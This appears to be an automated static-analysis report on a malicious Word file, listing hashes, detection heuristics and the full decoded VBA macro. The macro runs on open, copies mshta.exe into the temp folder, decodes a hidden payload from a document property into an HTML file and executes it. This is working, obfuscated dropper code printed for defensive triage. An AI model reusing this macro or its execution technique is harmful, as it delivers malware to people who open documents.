Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 cd43b5b630c1a81c…

MALICIOUS

Office (OOXML)

Size: 99.9 KB
Created: 2020-11-18 20:56:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-11-23
MD5: 7e698d05e56fd1a67ca5d4fe9802f8c8
SHA-1: 629fa16c6ef6a01b210edb1558635edc671e8919
SHA-256: cd43b5b630c1a81cd463dbf83c4a82f604d971144ca4a118892dcf836c1ccaf7
Risk Score: 138

Heuristics (6)

  • ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
  • VBA project inside OOXML [medium] 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    Call CreateObject("ws" + aYdvMe + "ell").run(aMkhL1)
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Sub AutoOpen()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script:
    a2QVj = Environ(a5rKYt)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found, each with the channel that reached it:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing  In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml  In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape  In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/  In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#  In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/  In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#  In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/  In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/  In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename / Kind / Source / Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 10497 bytes
SHA-256: ec3495d52ca1332b4623a47a5c7564bcce3c18ee4a8603481389dba7cd8a296b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aGlTb"
Sub AutoOpen()
aPN9J
End Sub

Attribute VB_Name = "aRkqv"
Public Const aXf9m As String = ""
Public Const aqj58p As Integer = -338 + 351
Public Const ak4dK As String = "1ridn1iw1"
Public Const a5XVT As String = "231met1sys1"
Public Const a52Bf As String = "p1m1e1t"
Public Const aYdvMe As String = "cript.sh"
Function ag6z1o()
End Function
Sub aOyWEV(aHkQ63)
' Limitation inflation clips certify breech magistracy
' Html misc reconstruction
' Builders tennis affix
' Fastness vietnam
' Yawn walnut
' Voting applies gad
' Nickname binding ps wyoming durham
' Cars
' 224 flu nick mary building
' Orient throat incidental negotiations forty
' Select fares rimini elliott
' Major-domo salve gui
' Travel kith fred
' Uplifting strips advisers miscreant
' Dweller readings
' Poster
' Benny sicken mediocrity scorching
' Insertion abjectly arranged cancelled films excel literary
' Commentaries calibre
' Eds loathsome
' Fifty-one attributes horny
' Yesterday cr imp unravel argued liaison um
' Fri sortie
' Syringe
' Headed involve ben
' Constructed confiscate
' Portuguese operational benefit
' Woodwork customize magyar taboo dress viscera
' Spears contributor seance rebirth sbjct
' Translation
' Trice rotation dome
' Burn refused indoor
' Tomahawk ph.d. scientifically
' Mumbai
' Amongst lu
' Programmes hallucination widower speaks eph.
' Usa irrelevant gather revenge mesquite claims briton boat
' Wildfire solutions
' Anne disability promises commonwealth infections
' Fulsome loathe chronic
' Suffix instructors potatoes lf
' Texas matched slash puerile expand
' Pond votes probate
' Acknowledgement olive factors fickleness windows sedative
' Livecam protocols characteristic
' Seeker turn tweed uniprotkb cayman laymen bahamas
' Sprinkle commodity undefiled measures
' Capitalism lettuce
' Recurrence model united smoking waterfall lodge
' Delays mhz drug shameless nettle
' Inputs dive bruno
' Nasdaq
' Prevention trellis predicate mistrust
' Plate grumble tuesday indian escort sideboard awning
' Subdivision mins
' Mesquite
End Sub
Function a40cgl(aoKCa)
' Tripadvisor diabolical
' Ph homework dominoes secondary feeling emmanuel
' Butchers jaunt tablets goa well-worn
' Yu buffer
' Specifics dirk examples mas
' Croatia accumulates fractional binding snorted
' Geographic occurs cider adams survey dab
' Acutely abhor tasmania restricted
' Join wal
' Settler liberty santa execution cranny
' Rife meat
' Galen
' Removal annotated pub telegraphic unobtrusive shakira
' Sweet until ionian uncover namur
' Stanley brick definitions limits bob
' Vb eastwards cosmetics ccd
' Unsaid sumatra funding
' Eternal gain mating
' Computer
' Algeria gangway means
' Vesta Word tangent shank
' Afoot guaranteed
a40cgl = ActiveDocument.BuiltInDocumentProperties(aoKCa)
End Function
Public Sub aN5MS8()
aKzSg
End Sub
Public Sub ayG652()
awvtKE
End Sub

Attribute VB_Name = "aEuDre"
Public Function a7MlNm(aKAVu, a2NAig)
' Timer insight evaluate astern resolve
' Gray
' Deadly portent
' Uno
' Angola sharon tandem container
' Medium
' Pate log pentium stroke altered
' Fat speeches reliance
' Likewise colin solo beckon
' Dying squaw reviewing
' Inflection ian plantains
' Fatherless personalized louis mm polished
' Sleeve surprised dowdy burlington var mashed
FileNumber = FreeFile
Open aKAVu For Output As #FileNumber
Print #FileNumber, a2NAig
Close #FileNumber
End Function
Sub ag6pTQ(apWO78, aYS5dp)
' Nitrogen presence commendable unpremeditated
' Diving transit remains
' Barrage diplomatist astuteness propensity
' Deathbed novelty kitten israeli
' Jacobus greens
' Containers uncanny sudden repertory decorate bevy
' Loan
' Adventures
' Tcp dyke
' Wang dom corpus changelog
' Her touring franklin
' Garbage
' Nonce gavin script
' Enabled gold disclaimers composer surpassing
' Suckling air prev
' Bo davies bluish decadence
' Amazingly developing
' Pending amalgamation furnished bigotry governance
' Consideration exorbitant
' Lady porcelain fuji
' Painted sou answered promotes
' Poems eph. greenery
' Viking impromptu ltd inappropriate incontrovertible
' Spry
' Pawn fully trans
' Geological tighten unopened surrounding
' Chains identical unrequited republic interim
' Garland choices listings tomatoes knight
' Healing topless channel
' Does cafe dat comparable snout
' Application promoting chronology cycling
' Formations hindu webpage narrator
' Interpolation crane pakistan
FileCopy apWO78, aYS5dp
End Sub
Function aa5BV(aki7H)
aa5BV = aki7H
End Function
Function azxe8Y(aki7H) As String
Dim a9pWK7 As Long
Dim a9ukg As Integer
Dim aTxoh As Integer
For a9pWK7 = 1 To Len(aki7H)
aTxoh = 0
aTX18z = Mid(aki7H, a9pWK7, 1)
' Braces
a9ukg = Asc(aTX18z)
' Hampton bristol rt butt revolution
If (a9ukg > aTs2J5(-30873 + 30874) And a9ukg < aTs2J5(5093 - 5091)) Or (a9ukg > aTs2J5(9991 - 9988) And a9ukg < aTs2J5(-2988 + 2992)) Then
aTxoh = aqj58p
a9ukg = aL1Qlh(a9ukg, aTxoh)
' Virtual thousandth
' Suckling slide
' Lil tu
' Tutelary bible
' Wise schooling discipline
' Soap metal incredulous socket sty
' Pollyanna malaysia bridesmaid roulette
' Defendant mere
' Vagrant
' Contiguous
If a9ukg < aTs2J5(5) And a9ukg > 83 Then
a9ukg = ajr58S(a9ukg)
ElseIf a9ukg < -274 + 339 Then
a9ukg = ajr58S(a9ukg)
End If
End If
' President foolscap manipulation assessed
aA4D3 = aw0QW(a9ukg)
' Servers financing
Mid$(aki7H, a9pWK7, 1) = aa5BV(aA4D3)
Next a9pWK7
azxe8Y = aki7H
End Function

Attribute VB_Name = "aBFShJ"
Function a4MJAD(amICdy)
' Dont honest
aNFwR = amICdy
aTw4c = Len(aNFwR)
For a12Iv = 0 To aTw4c - 1
' Hosted generation
awa0t = awa0t & Mid(aNFwR, (aTw4c - a12Iv), 1)
Next a12Iv
a4MJAD = awa0t
End Function
Public Function acTsG(aqmip)
acTsG = Replace(aqmip, aXf9m, "")
' Stretch marathon nr levels fighter
' Figuratively switches seminar sheriff paper
' Clive cuirass immunology
' Minus
' Obadiah windsor
' Groove strut res groove anglia
' Astrology joel conditional
' Supplies gambler transform river ol
' Co-operate reveal treasurer wicker permission
' Gush tradespeople masked
' Bran loft
End Function
Sub aPN9J()
' Lung schedule chain
' Opprobrium varying lag
aN5MS8
' Cute canada playing nutten occult
ayG652
Call CreateObject("ws" + aYdvMe + "ell").run(aMkhL1)
End Sub

Attribute VB_Name = "aqj05"
Function a2QVj(a5rKYt)
' Cons synthetic shell diplomatist
a2QVj = Environ(a5rKYt)
End Function
Function ad27J()
' Gleefully arrest lugubrious
With Application
ad27J = .PathSeparator
End With
End Function
Function awl9Mc(axRl1)
ayi3I = VBA.Split(a4MJAD("lmth.ni|moc.ni|exe.athsm"), "|")
' Latter whatever versions va. lot
' Cassette invision intermediary
' Undo
' Elaboration
' Installations
' Italiano
' Reservoir melee
' Blowjobs
' Sneak j operate
' Peach sunstroke somebody microscope
' Drama frustrate truly
' Frontier super thereof terms
' Ablest tack pawn
' Twenty-seven
' Embrasure medina
' Presenting polyphonic proverbs
' Silent twenty-nine upskirt
' Consults lithuania undertakings carlo motivated
' Adroitly off gauze
' Lexicon moving
' Snub mathematical graduation tut pour powder
' English dwelling-place synthesis
' Lice
' Hardcover uncertainty slipper versatility manual
' Ecuador ky.
' Agreements pup majority
' Bent psyche
' Harmony inadvertently sufficiently follower
' Object elections joiner adorable
' Appears
' Deafening physiology claw
' Topping
' Seneca tract
' Intuitively craftsmen allah porno
' Wrapper blurred
Select Case axRl1
Case 0:
awl9Mc = a2QVj(Replace(a4MJAD(ak4dK), "1", "")) & ad27J & Replace(a4MJAD(a5XVT), "1", "") & ad27J & ayi3I(0)
Case 1:
awl9Mc = a2QVj(Replace(a4MJAD(a52Bf), "1", "")) & ad27J & ayi3I(1)
' Hypocritical
' Peddler terminus augur
' Euros immigration rfc
' Colloquy voted tar describes
' Distil perspectives transition serenade odium debian
' Spoonful adventitious stand gaudy reopen
' Warranty participated vampire cognizant
' Materialism byte unruly
' Chloride
' Loathe levels
Case 2:
' Frozen
' Tarried fortune celebrate cramps sunshine his
' Patterns rx devel untenable rupture
' Accustom suggest
' Sewer palaver obsession appreciative willow
' Flippancy falcon identifies toddler ago cigarettes lisa
' Moderate conditioning barcelona th welled
' Entree ven muslims props genres possibilities
' Hilarious pill absorb nazareth calculator educate
' Inexpensive stanford craftsman
' Movements rouge montenegro
awl9Mc = a2QVj(Replace(a4MJAD(a52Bf), "1", "")) & ad27J & ayi3I(2)
End Select
End Function
Sub awvtKE()
afXnz = aT71Mq(awl9Mc(2))
a7MlNm afXnz, azxe8Y(a40cgl("category"))
End Sub

Attribute VB_Name = "avQuj"
Function axGRa8(ayaSwv)
' Petulant belly multimedia twisted tapers inherited
axGRa8 = (acTsG(ayaSwv))
End Function
Function aJ1my8(a9Lbr)
aJ1my8 = (acTsG(a9Lbr))
End Function
Function aT71Mq(auQOLe)
' Albany diving fairy-tale wedlock
' Evident occurrence missions
' Ride
' Enacting downloads diseases
' Boar low consequently translated
' Breton unfounded addicted garcia monty
' Brats digs
' Deposit financing deviant impoverished savannah
' Cad perspectives itinerant awe-struck
' Skylight pellucid publishers digit sometimes
' Promo sirrah
aT71Mq = (acTsG(auQOLe))
End Function
Function aMkhL1()
agBvTo = aJ1my8(awl9Mc(1))
ajTQp = aT71Mq(awl9Mc(2))
aMkhL1 = agBvTo & " " & ajTQp
End Function

Attribute VB_Name = "afLHIV"
Sub aKzSg()
atVwB = axGRa8(awl9Mc(0))
aHatF = aJ1my8(awl9Mc(1))
ag6pTQ atVwB, aHatF
End Sub
Function ajr58S(a53qTM)
ajr58S = a53qTM + -1095 + 1121
End Function
Function aTs2J5(aPB8T)
If aPB8T = 0 Then
aTs2J5 = -21762 + 21763
ElseIf aPB8T = 1 Then
aTs2J5 = 19 + 45
ElseIf aPB8T = 2 Then
aTs2J5 = -22 + 113
ElseIf aPB8T = 3 Then
aTs2J5 = 127 - 31
ElseIf aPB8T = 4 Then
aTs2J5 = 251 - 128
ElseIf aPB8T = 5 Then
aTs2J5 = 30361 / 313
Else
aTs2J5 = 1030 - 6
End If
End Function
Function aL1Qlh(a53qTM, aBt7U)
aL1Qlh = a53qTM - aBt7U
End Function
Function aw0QW(a53qTM)
aw0QW = VBA.ChrW(a53qTM)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 46080 bytes
SHA-256: 3ce139524807add5807a3fbb723c7482b97d6b7a719ecea98a235360aea1b93c